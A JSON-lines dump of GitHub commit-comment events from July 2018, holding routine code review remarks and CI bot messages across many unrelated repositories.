{"id":"7972824759","type":"CommitCommentEvent","actor":{"login":"johntinashe"},"repo":{"name":"johntinashe/ShopCartAndroid"},"payload":{"comment":{"id":29726114,"position":null,"line":null,"path":null,"commit_id":"7f1e760771377f47fe464a58d59cdef042ee0551","created_at":"2018-07-16T20:37:22Z","updated_at":"2018-07-16T20:37:22Z","author_association":"OWNER","body":"![Shop Cart] (https://firebasestorage.googleapis.com/v0/b/shopcart-6fc67.appspot.com/o/Screenshot_20180716-212711_OneDrive.jpg?alt=media&token=8d2ca506-5644-4849-8602-393ef4bb8941)"}},"created_at":"2018-07-16T20:37:22Z"}
{"id":"7972826851","type":"CommitCommentEvent","actor":{"login":"Munter"},"repo":{"name":"assetgraph/assetgraph"},"payload":{"comment":{"id":29726121,"position":null,"line":null,"path":null,"commit_id":"4b2e51a59167f065dbdabd0064d46d18ba73f149","created_at":"2018-07-16T20:37:46Z","updated_at":"2018-07-16T20:37:46Z","author_association":"MEMBER","body":"One day we'll need to find out if all of these always occur together and have some sort of common property we can give a name so we can query for them"}},"created_at":"2018-07-16T20:37:46Z"}
{"id":"7972832018","type":"CommitCommentEvent","actor":{"login":"juancampa"},"repo":{"name":"aranajhonny/membrane-driver-gmail"},"payload":{"comment":{"id":29726127,"position":24,"line":24,"path":"pubsub.js","commit_id":"42a4d4e65d2cd99463d3ef3ba371770282080b2a","created_at":"2018-07-16T20:38:52Z","updated_at":"2018-07-16T20:38:52Z","author_association":"NONE","body":"this can be moved to `index.js` since it's specific to this driver"}},"created_at":"2018-07-16T20:38:52Z"}
{"id":"7972832706","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29726129,"position":null,"line":null,"path":null,"commit_id":"4925a9910a5e54167952a07830519e835d58c187","created_at":"2018-07-16T20:39:00Z","updated_at":"2018-07-16T20:39:00Z","author_association":"NONE","body":"Someone reported that log message from his worker\r\nhttps://groups.google.com/d/msg/fishcooking/4vtbgKU6yj0/ewN_1b86CAAJ\r\n\r\n> \r\n> Base-4925a99 doesn't have option PassedDanger[2]\r\n> Base-4925a99 doesn't have option mPassedFile[1]\r\n> New-4925a99 doesn't have option PassedDanger[2]\r\n> New-4925a99 doesn't have option mPassedFile[1]\r\n\r\nAnd indeed, initial value of PassedDanger[2] and mPassedFile[1] were 0,\r\nand the way it was set up the effective range was [0,0].\r\nIn this case, no option is created, which means that despite the tuning changes, \r\nthese values were not updated and should stay 0 when you will test them.\r\n\r\n\r\n"}},"created_at":"2018-07-16T20:39:00Z"}
{"id":"7972838942","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29726143,"position":2,"line":2,"path":"Applications/spire/source/book_view/book_view_highlight_properties.cpp","commit_id":"947fda4c94761ee30bbd2bdcd656521a000fd28f","created_at":"2018-07-16T20:40:18Z","updated_at":"2018-07-16T20:40:18Z","author_association":"COLLABORATOR","body":"Remove any changes to this file, they will go in their own branch."}},"created_at":"2018-07-16T20:40:18Z"}
{"id":"7972841930","type":"CommitCommentEvent","actor":{"login":"r1ft4469"},"repo":{"name":"brimstone/docker-kali"},"payload":{"comment":{"id":29726149,"position":null,"line":null,"path":null,"commit_id":"92aa1d10a6ab2596e8fb95e8f1debeb656a50de9","created_at":"2018-07-16T20:40:56Z","updated_at":"2018-07-16T20:40:56Z","author_association":"NONE","body":"what modules are you missing all of mine seem to be showing up."}},"created_at":"2018-07-16T20:40:56Z"}
{"id":"7972842237","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29726150,"position":null,"line":null,"path":null,"commit_id":"5cecc937f8d5ab13568a50a2374ab6e25d38c2b2","created_at":"2018-07-16T20:41:01Z","updated_at":"2018-07-16T20:41:01Z","author_association":"NONE","body":"Could try keeping line 750 the same, but changing 751 to ...\r\n``pushThreat &= ~attacksByPawns & ~poorlyDefended``\r\nMakes more sense I feel. Good luck!"}},"created_at":"2018-07-16T20:41:01Z"}
{"id":"7972846312","type":"CommitCommentEvent","actor":{"login":"axd1967"},"repo":{"name":"obsproject/obs-studio"},"payload":{"comment":{"id":29726157,"position":null,"line":null,"path":null,"commit_id":"17d2a17f9ed85d31cb7ba76ba49e30258983bb0b","created_at":"2018-07-16T20:41:51Z","updated_at":"2018-07-16T20:41:51Z","author_association":"NONE","body":"there is a subtle feeling here that \"clipping\" is a confusing subject: in reality, this code deals with input clipping\", while the concept of \"output clipping\" does not yet exist in OBS (21.1.1).\r\n\r\nwhat happens here is that a case of \"input clipping\" leads to a sort of clipping indication (i.e. some sort of \"output\" related clipping) in the volume slider. there will be distortion, but \"output clipping\" is in reality a different beast, a result of mixing with a too high volume as a result. (this is related to https://ideas.obsproject.com/ideas/170/output-volume-visualization)\r\n\r\nso the \"clipping\" that this code tries to signal, is in fact a \"distortion warning due to input clipping on a specific channel\".\r\n"}},"created_at":"2018-07-16T20:41:51Z"}
{"id":"7972848637","type":"CommitCommentEvent","actor":{"login":"tdewolff"},"repo":{"name":"tdewolff/minify"},"payload":{"comment":{"id":29726163,"position":null,"line":null,"path":null,"commit_id":"835afedd1a7d95549ad735ed1c5ba3d357e21674","created_at":"2018-07-16T20:42:21Z","updated_at":"2018-07-16T20:42:21Z","author_association":"OWNER","body":"I don't think it is as easy as you make it sound. If we remove all whitespace, we can get even worse CSS. See for example: `baddecl baddecl`, this would become `baddeclbaddecl` if we remove whitespace. I guess we could remove whitespace around delimiters, but that is a bit arbitrary and unreliable. I think the cleanest option would be option 1."}},"created_at":"2018-07-16T20:42:21Z"}
{"id":"7972849354","type":"CommitCommentEvent","actor":{"login":"ncopa"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29726165,"position":null,"line":null,"path":null,"commit_id":"b8d6bb0171bcb609a8d839be9ca8cc24c65726c8","created_at":"2018-07-16T20:42:31Z","updated_at":"2018-07-16T20:42:31Z","author_association":"CONTRIBUTOR","body":"> You consider all (legitimate) criticism as a harassment?\r\n\r\nI don't consider positive criticism as harassment. It completely depends on [the intention behind it](https://hellogiggles.com/lifestyle/difference-between-constructive-criticism-and-bullying/).\r\n\r\nI do notice that you included the word *all* in your question. Do you really think that I would consider absolutely *all* criticism (legitmate or not) as harassment? I belive you know me better than that, so I again question your intention here.\r\n\r\n> I quite can't imagine how this can happen by mistake.\r\n\r\nI thought it was pretty obvious that it was a mistake so I found your comment pretty offensive. I still don't understand what the purpose of your comment was if it was not to offend/distract/demotivate.\r\n"}},"created_at":"2018-07-16T20:42:31Z"}
{"id":"7972856823","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29726173,"position":10,"line":30,"path":"src/checkin/checkInActions.js","commit_id":"27610973f812d74d476bc90b6cc15b3985ca05b8","created_at":"2018-07-16T20:44:04Z","updated_at":"2018-07-16T20:44:04Z","author_association":"MEMBER","body":"@cioan this all looks good, though this action confused me at first... shouldn't it really be called \"getExpectedToCheckIn\" or something similar, because it first fetches the patients with appointments (or will do that eventually) and then subtracts those with an active visit?  It was confusing when I looked at the CheckInQueue componentDidMount that it dispatches a \"checkForVisits\" action because what that queue is going to display is expected patients that did *not* yet have visits, and the name made be think it was going to fetch patients that *had* visits? Does that make sense?"}},"created_at":"2018-07-16T20:44:04Z"}
{"id":"7972856915","type":"CommitCommentEvent","actor":{"login":"spireken"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29726174,"position":null,"line":null,"path":null,"commit_id":"947fda4c94761ee30bbd2bdcd656521a000fd28f","created_at":"2018-07-16T20:44:06Z","updated_at":"2018-07-16T20:44:06Z","author_association":"COLLABORATOR","body":"I don't know why they're here, I made these changes in a separate branch."}},"created_at":"2018-07-16T20:44:06Z"}
{"id":"7972858485","type":"CommitCommentEvent","actor":{"login":"randilfernando"},"repo":{"name":"msstack/msstack"},"payload":{"comment":{"id":29726176,"position":7,"line":11,"path":".travis.yml","commit_id":"1cb8c720d267c5b1daf9705bc5e45d9e5c22dc8d","created_at":"2018-07-16T20:44:25Z","updated_at":"2018-07-16T20:44:25Z","author_association":"MEMBER","body":"Getting coverage reporter from api.github will fail sometimes thats why I used sonatype repository\r\nwget -O ~/codacy-coverage-reporter-assembly-latest.jar https://oss.sonatype.org/service/local/repositories/releases/content/com/codacy/codacy-coverage-reporter/4.0.0/codacy-coverage-reporter-4.0.0-assembly.jar"}},"created_at":"2018-07-16T20:44:25Z"}
{"id":"7972858705","type":"CommitCommentEvent","actor":{"login":"mchien20"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29726178,"position":null,"line":null,"path":null,"commit_id":"8e0c452e0c7fc5886047d24802e7c0e7bf56399c","created_at":"2018-07-16T20:44:28Z","updated_at":"2018-07-16T20:44:28Z","author_association":"COLLABORATOR","body":"I didn't copy it down, but it appeared after I pushed and said that there was an error for pushing on github(?). It didn't seem to be an error for the content of the file."}},"created_at":"2018-07-16T20:44:28Z"}
{"id":"7972860132","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29726179,"position":null,"line":null,"path":null,"commit_id":"207002221250780bc3620f6285b998597c3be478","created_at":"2018-07-16T20:44:46Z","updated_at":"2018-07-16T20:44:46Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/207002221250780bc3620f6285b998597c3be478/index.html"}},"created_at":"2018-07-16T20:44:46Z"}
{"id":"7972861366","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29726184,"position":null,"line":null,"path":null,"commit_id":"8e0c452e0c7fc5886047d24802e7c0e7bf56399c","created_at":"2018-07-16T20:45:02Z","updated_at":"2018-07-16T20:45:02Z","author_association":"CONTRIBUTOR","body":"Are you still getting the error?\n\nAll the best,\n\nNick\n\n> On Jul 16, 2018, at 1:44 PM, Margaret Chien <notifications@github.com> wrote:\n> \n> I didn't copy it down, but it appeared after I pushed and said that there was an error for pushing on github(?). It didn't seem to be an error for the content of the file.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-16T20:45:02Z"}
{"id":"7972861643","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29726186,"position":2,"line":2,"path":"Applications/spire/source/book_view/book_view_highlight_properties.cpp","commit_id":"947fda4c94761ee30bbd2bdcd656521a000fd28f","created_at":"2018-07-16T20:45:06Z","updated_at":"2018-07-16T20:45:06Z","author_association":"COLLABORATOR","body":"Once the changes are removed I will approve the merge."}},"created_at":"2018-07-16T20:45:06Z"}
{"id":"7972862137","type":"CommitCommentEvent","actor":{"login":"linlingao"},"repo":{"name":"ARMmbed/DAPLink"},"payload":{"comment":{"id":29726189,"position":38,"line":38,"path":"source/target/ti/cc3220sf/validation.c","commit_id":"aa88a1351020feccfcd16a6086c09e7c4ad4a4d3","created_at":"2018-07-16T20:45:12Z","updated_at":"2018-07-16T20:45:12Z","author_association":"COLLABORATOR","body":"please redo this code. memcpy copies a block of memory, no need to do it in a while loop.\r\nAlso you can use memcompare. There's no need to have a loop here."}},"created_at":"2018-07-16T20:45:12Z"}
{"id":"7972868717","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29726200,"position":null,"line":null,"path":null,"commit_id":"44ecc3507f2cfa84b7e152e14eea1bba321fdaa0","created_at":"2018-07-16T20:46:33Z","updated_at":"2018-07-16T20:46:33Z","author_association":"OWNER","body":"Okay with commit e7bf72a4462d74ff70a26166e95ef9a732f0dace, I am pausing on 1st step, but it sure is painful! :\r\n```\r\nif (msg.sender == owner) balance = ownerBalance;\r\nif (msg.sender == bob) balance == bobBalance;\r\nif (msg.sender == carol) balance == carolBalance;\r\n```"}},"created_at":"2018-07-16T20:46:33Z"}
{"id":"7972869531","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29726201,"position":21,"line":21,"path":"src/main/java/com/github/pavelhe/dao/AuthorDaoImpl.java","commit_id":"bb20f4d6ffac9776d7081aa428d6bbfe90e77d02","created_at":"2018-07-16T20:46:43Z","updated_at":"2018-07-16T20:46:43Z","author_association":"NONE","body":"`Collections.emptyMap()` вместо `new HashMap<>()`"}},"created_at":"2018-07-16T20:46:43Z"}
{"id":"7972869920","type":"CommitCommentEvent","actor":{"login":"jackfrancis"},"repo":{"name":"Azure/acs-engine"},"payload":{"comment":{"id":29726202,"position":null,"line":null,"path":null,"commit_id":"2b88659988242a02c66bf296b2aa8f3a3c9bdc1c","created_at":"2018-07-16T20:46:48Z","updated_at":"2018-07-16T20:46:48Z","author_association":"MEMBER","body":"@andyzhangx containerd is not turned on by default. Could you file an issue or open a WIP PR that reminds us that containerd won't work in mooncake until we fix this? :)"}},"created_at":"2018-07-16T20:46:48Z"}
{"id":"7972871351","type":"CommitCommentEvent","actor":{"login":"brimstone"},"repo":{"name":"brimstone/docker-kali"},"payload":{"comment":{"id":29726204,"position":null,"line":null,"path":null,"commit_id":"92aa1d10a6ab2596e8fb95e8f1debeb656a50de9","created_at":"2018-07-16T20:47:07Z","updated_at":"2018-07-16T20:47:07Z","author_association":"OWNER","body":"There's about 1000 or so modules that don't get loaded intk the database cache. When you start this image and try to search, metasploit complains about the cache not being built yet. "}},"created_at":"2018-07-16T20:47:07Z"}
{"id":"7972875855","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29726272,"position":32,"line":32,"path":"src/main/java/com/github/pavelhe/dao/AuthorDaoImpl.java","commit_id":"bb20f4d6ffac9776d7081aa428d6bbfe90e77d02","created_at":"2018-07-16T20:47:58Z","updated_at":"2018-07-16T20:47:58Z","author_association":"NONE","body":"`Collections.singletonMap(\"id\", id)`"}},"created_at":"2018-07-16T20:47:58Z"}
{"id":"7972876032","type":"CommitCommentEvent","actor":{"login":"stefanofornari"},"repo":{"name":"beanshell/beanshell"},"payload":{"comment":{"id":29726283,"position":102,"line":242,"path":"src/main/java/bsh/Interpreter.java","commit_id":"9b4d2d746f0653be93dcbb1dbc8c4a53ba3c9430","created_at":"2018-07-16T20:48:00Z","updated_at":"2018-07-16T20:48:00Z","author_association":"CONTRIBUTOR","body":"this is broken as well (see next comment)"}},"created_at":"2018-07-16T20:48:00Z"}
{"id":"7972881892","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"CanyonTurtle/rosserial"},"payload":{"comment":{"id":29726288,"position":15,"line":127,"path":"rosserial_vex_cortex/README.md","commit_id":"a22ff270797f63a8a29dcd76af049f0c990f39b3","created_at":"2018-07-16T20:49:11Z","updated_at":"2018-07-16T20:49:11Z","author_association":"NONE","body":"If it helps, I can confirm that this global variable issue is fixed in PROS 3."}},"created_at":"2018-07-16T20:49:11Z"}
{"id":"7972882353","type":"CommitCommentEvent","actor":{"login":"iwebwork"},"repo":{"name":"iwebwork/LavaJatoProjetoIOT"},"payload":{"comment":{"id":29726291,"position":null,"line":null,"path":null,"commit_id":"6307488d37f025b89887e1920f17f0985edf25a1","created_at":"2018-07-16T20:49:16Z","updated_at":"2018-07-16T20:49:16Z","author_association":"OWNER","body":"OBS: Foi feito  a base para o menu,ocorreu um erro de digitação."}},"created_at":"2018-07-16T20:49:16Z"}
{"id":"7972882665","type":"CommitCommentEvent","actor":{"login":"a1ex2k"},"repo":{"name":"MasterDevX/RAM-Logger"},"payload":{"comment":{"id":29726293,"position":5,"line":8,"path":"README.md","commit_id":"cb9c5948defd481f0364e60aa9cf7ffa43564f2a","created_at":"2018-07-16T20:49:20Z","updated_at":"2018-07-16T20:49:20Z","author_association":"NONE","body":"No 1, my mistake"}},"created_at":"2018-07-16T20:49:20Z"}
{"id":"7972884559","type":"CommitCommentEvent","actor":{"login":"randilfernando"},"repo":{"name":"msstack/msstack"},"payload":{"comment":{"id":29726297,"position":10,"line":14,"path":".travis.yml","commit_id":"1cb8c720d267c5b1daf9705bc5e45d9e5c22dc8d","created_at":"2018-07-16T20:49:45Z","updated_at":"2018-07-16T20:49:45Z","author_association":"MEMBER","body":"Need to send aggregate test coverage result (Check whether this send aggregate result)"}},"created_at":"2018-07-16T20:49:45Z"}
{"id":"7972889546","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29726306,"position":null,"line":null,"path":null,"commit_id":"52289b6b8f1f0907c44f8006128c514ff6f2dce7","created_at":"2018-07-16T20:50:46Z","updated_at":"2018-07-16T20:50:46Z","author_association":"CONTRIBUTOR","body":"I'm a dummy here :) What are dual architecture libraries?"}},"created_at":"2018-07-16T20:50:46Z"}
{"id":"7972889622","type":"CommitCommentEvent","actor":{"login":"Baddhizm"},"repo":{"name":"Baddhizm/simple-mapper"},"payload":{"comment":{"id":29726307,"position":null,"line":null,"path":null,"commit_id":"b0085acf770932b2b89e0939161476d37e03c0f4","created_at":"2018-07-16T20:50:47Z","updated_at":"2018-07-16T20:50:47Z","author_association":"OWNER","body":"Don't hit me..."}},"created_at":"2018-07-16T20:50:47Z"}
{"id":"7972891463","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29726316,"position":39,"line":39,"path":"src/main/java/com/github/pavelhe/dao/BookDaoImpl.java","commit_id":"bb20f4d6ffac9776d7081aa428d6bbfe90e77d02","created_at":"2018-07-16T20:51:10Z","updated_at":"2018-07-16T20:51:10Z","author_association":"NONE","body":"Ой не надо делать конкетенацию.\r\n1. Запрос чиатть тяжелее - пусть лучше будет здесь в методе.\r\n2. Это рано или поздно к SQL-инъекция приведёт."}},"created_at":"2018-07-16T20:51:10Z"}
{"id":"7972898668","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29726333,"position":6,"line":6,"path":"src/main/java/com/github/pavelhe/dao/mappers/MapperConstance.java","commit_id":"bb20f4d6ffac9776d7081aa428d6bbfe90e77d02","created_at":"2018-07-16T20:52:40Z","updated_at":"2018-07-16T20:52:40Z","author_association":"NONE","body":"Да не надо это выносить.\r\nЭто один фиг останется в DAO. Если уж очень хочется вынести - пусть в DAO лежат.\r\nНо я бы просто бы RowMapper сделал внутренним классом."}},"created_at":"2018-07-16T20:52:40Z"}
{"id":"7972899110","type":"CommitCommentEvent","actor":{"login":"x86"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29726335,"position":null,"line":null,"path":null,"commit_id":"6f26f0df5f350c745e00474a31ccba04ee037413","created_at":"2018-07-16T20:52:45Z","updated_at":"2018-07-16T20:52:45Z","author_association":"CONTRIBUTOR","body":"Dirty commit.\r\n1. Function not fully renamed.\r\n2. What about backwards compatibility?"}},"created_at":"2018-07-16T20:52:45Z"}
{"id":"7972903085","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29726347,"position":58,"line":58,"path":"src/main/java/com/github/pavelhe/shell/GenreCommands.java","commit_id":"bb20f4d6ffac9776d7081aa428d6bbfe90e77d02","created_at":"2018-07-16T20:53:32Z","updated_at":"2018-07-16T20:53:32Z","author_association":"NONE","body":"Бомбический интерфейс!"}},"created_at":"2018-07-16T20:53:32Z"}
{"id":"7972905555","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29726353,"position":1,"line":1,"path":"src/main/resources/locales/messages_en.properties","commit_id":"bb20f4d6ffac9776d7081aa428d6bbfe90e77d02","created_at":"2018-07-16T20:54:03Z","updated_at":"2018-07-16T20:54:03Z","author_association":"NONE","body":"Повторюсь, что лучше проперти называть с точками. authors.count"}},"created_at":"2018-07-16T20:54:03Z"}
{"id":"7972905882","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29726354,"position":8,"line":41,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T20:54:08Z","updated_at":"2018-07-16T20:54:08Z","author_association":"CONTRIBUTOR","body":"그렇네요. 보통은 특정 유저를 찾는 케이스가 많죠."}},"created_at":"2018-07-16T20:54:08Z"}
{"id":"7972908201","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29726362,"position":null,"line":null,"path":null,"commit_id":"3e079f522b528788706d6caf5121e8059de11ae0","created_at":"2018-07-16T20:54:34Z","updated_at":"2018-07-16T20:54:34Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-49](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-49).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-49-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T20:54:34Z"}
{"id":"7972912856","type":"CommitCommentEvent","actor":{"login":"werthen"},"repo":{"name":"ZeusWPI/zeus.ugent.be"},"payload":{"comment":{"id":29726371,"position":null,"line":null,"path":null,"commit_id":"2e1269db0a6e75a30860cab2d77346351565abe3","created_at":"2018-07-16T20:55:31Z","updated_at":"2018-07-16T20:55:31Z","author_association":"MEMBER","body":"but muh precedence https://stackoverflow.com/questions/27429711/can-someone-explain-not-vs-in-ruby\r\n\r\nuse `not` if you're using statements as control flow"}},"created_at":"2018-07-16T20:55:31Z"}
{"id":"7972914842","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29726377,"position":1,"line":1,"path":"src/test/resources/schema-test.sql","commit_id":"bb20f4d6ffac9776d7081aa428d6bbfe90e77d02","created_at":"2018-07-16T20:55:55Z","updated_at":"2018-07-16T20:55:55Z","author_association":"NONE","body":"Смысла особого нет - чуть посложнее запросы - и синтаксис MySQL и H2 разъедется. Тут очень крто, что получилось совместить, но этого не нужно. А как это нормально тестировать, мы только с докером узнаем."}},"created_at":"2018-07-16T20:55:55Z"}
{"id":"7972915729","type":"CommitCommentEvent","actor":{"login":"Bundesferkel"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29726380,"position":null,"line":null,"path":null,"commit_id":"23a8d06ef48977c2e9242e4a2dc2e74b18447a07","created_at":"2018-07-16T20:56:07Z","updated_at":"2018-07-16T20:56:07Z","author_association":"NONE","body":"You have an error on line 19:\r\n\"replace into `achievement_criteria_data`\"\r\n\r\nThere's no table with this name. The nearest one is just `criteria-data`. I would agree, that the table in the world database should be renamed to your variant.\r\n\r\n"}},"created_at":"2018-07-16T20:56:07Z"}
{"id":"7972919989","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ncl-feedstock"},"payload":{"comment":{"id":29726388,"position":null,"line":null,"path":null,"commit_id":"68c561ce5712c299197df00566625fa4c6d70fb4","created_at":"2018-07-16T20:56:58Z","updated_at":"2018-07-16T20:56:58Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @marylhaley were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @marylhaley were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T20:56:58Z"}
{"id":"7972920798","type":"CommitCommentEvent","actor":{"login":"patrikjuvonen"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29726390,"position":null,"line":null,"path":null,"commit_id":"6f26f0df5f350c745e00474a31ccba04ee037413","created_at":"2018-07-16T20:57:09Z","updated_at":"2018-07-16T20:57:09Z","author_association":"CONTRIBUTOR","body":"As for the 2nd point this function is new to 1.5.6, so I guess technically it is not \"officially supported\" yet.\r\n\r\nWhether we should still do something about it..."}},"created_at":"2018-07-16T20:57:09Z"}
{"id":"7972923381","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29726393,"position":null,"line":null,"path":null,"commit_id":"21a14992106cd317f05b9b568d0c608a01721a51","created_at":"2018-07-16T20:57:40Z","updated_at":"2018-07-16T20:57:40Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nThe taskId is absent.\n\n</details>"}},"created_at":"2018-07-16T20:57:40Z"}
{"id":"7972926722","type":"CommitCommentEvent","actor":{"login":"benlavalley"},"repo":{"name":"faisalferoz/mongo-connector"},"payload":{"comment":{"id":29726396,"position":null,"line":null,"path":null,"commit_id":"a2fb7eca95634d61fd0b488e5cd266007f8ea712","created_at":"2018-07-16T20:58:17Z","updated_at":"2018-07-16T20:58:17Z","author_association":"NONE","body":"Beat me to it creating my own fork for this 👍 "}},"created_at":"2018-07-16T20:58:17Z"}
{"id":"7972931256","type":"CommitCommentEvent","actor":{"login":"hacraven"},"repo":{"name":"hacraven/Project"},"payload":{"comment":{"id":29726403,"position":null,"line":null,"path":null,"commit_id":"65bc720ba796e18f7895d02f319b21a85ec451f8","created_at":"2018-07-16T20:59:10Z","updated_at":"2018-07-16T20:59:10Z","author_association":"OWNER","body":"added controller Welcome index\r\nadded some filler space on this homepage"}},"created_at":"2018-07-16T20:59:10Z"}
{"id":"7972935456","type":"CommitCommentEvent","actor":{"login":"matthew-brett"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29726407,"position":null,"line":null,"path":null,"commit_id":"52289b6b8f1f0907c44f8006128c514ff6f2dce7","created_at":"2018-07-16T20:59:56Z","updated_at":"2018-07-16T20:59:56Z","author_association":"CONTRIBUTOR","body":"Oh - sorry - Mac still supports compilation of binaries that work both on 32-bit and on 64-bit, I think because there were some early Macs that were 32-bit.   These \"fat\" (dual-arch) binaries, have a special format that can contain 32 and 64 bit versions of the same routines.\r\n\r\nYou can make dual architecture binaries by building the code with a dual architecture compiler, that builds both 32-bit and 64-bit versions of the code, and puts them into the resulting \"fat\" binary file, or you can use the (hoho) `lipo` tool to take 32 and 64 bit versions and fuse then into a \"fat\" binary."}},"created_at":"2018-07-16T20:59:56Z"}
{"id":"7972936336","type":"CommitCommentEvent","actor":{"login":"timsong-cpp"},"repo":{"name":"cplusplus/LWG"},"payload":{"comment":{"id":29726411,"position":5,"line":28,"path":"issue1.html","commit_id":"5b243075b26dfe665d828121c4f5cb2d9d2ebb1f","created_at":"2018-07-16T21:00:07Z","updated_at":"2018-07-16T21:00:07Z","author_association":"NONE","body":"It might not be a bad idea to use something like https://github.com/MestreLion/git-tools#git-restore-mtime to avoid \"Last modified\" churn."}},"created_at":"2018-07-16T21:00:07Z"}
{"id":"7972946166","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29726433,"position":null,"line":null,"path":null,"commit_id":"1f061b43f649e115558060b1aaf58acdd5783806","created_at":"2018-07-16T21:01:57Z","updated_at":"2018-07-16T21:01:57Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - i386-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T21:01:57Z"}
{"id":"7972950610","type":"CommitCommentEvent","actor":{"login":"Sciguymjm"},"repo":{"name":"SaltieRL/ReplayAnalysis"},"payload":{"comment":{"id":29726443,"position":16,"line":36,"path":"game/actor_parsing.py","commit_id":"c13981cff915ada77170be035564025ba69804af","created_at":"2018-07-16T21:02:49Z","updated_at":"2018-07-16T21:02:49Z","author_association":"MEMBER","body":"yes"}},"created_at":"2018-07-16T21:02:49Z"}
{"id":"7972957805","type":"CommitCommentEvent","actor":{"login":"winstonchiong"},"repo":{"name":"DecisionLabUCSF/decisionlabucsf.github.io"},"payload":{"comment":{"id":29726460,"position":11,"line":76,"path":"_data/members.yml","commit_id":"987a4db249ba7c6fde8f252c540fbe6d36fbcaa0","created_at":"2018-07-16T21:04:12Z","updated_at":"2018-07-16T21:04:12Z","author_association":"COLLABORATOR","body":"Oops, my advice made things go crazy. Maybe simplify--instead of `({{ '/projects/index.html#dma' | prepend: site.baseurl | prepend: site.url }})`, try just `(/projects/index.html#dma)`, and similarly for the other links"}},"created_at":"2018-07-16T21:04:12Z"}
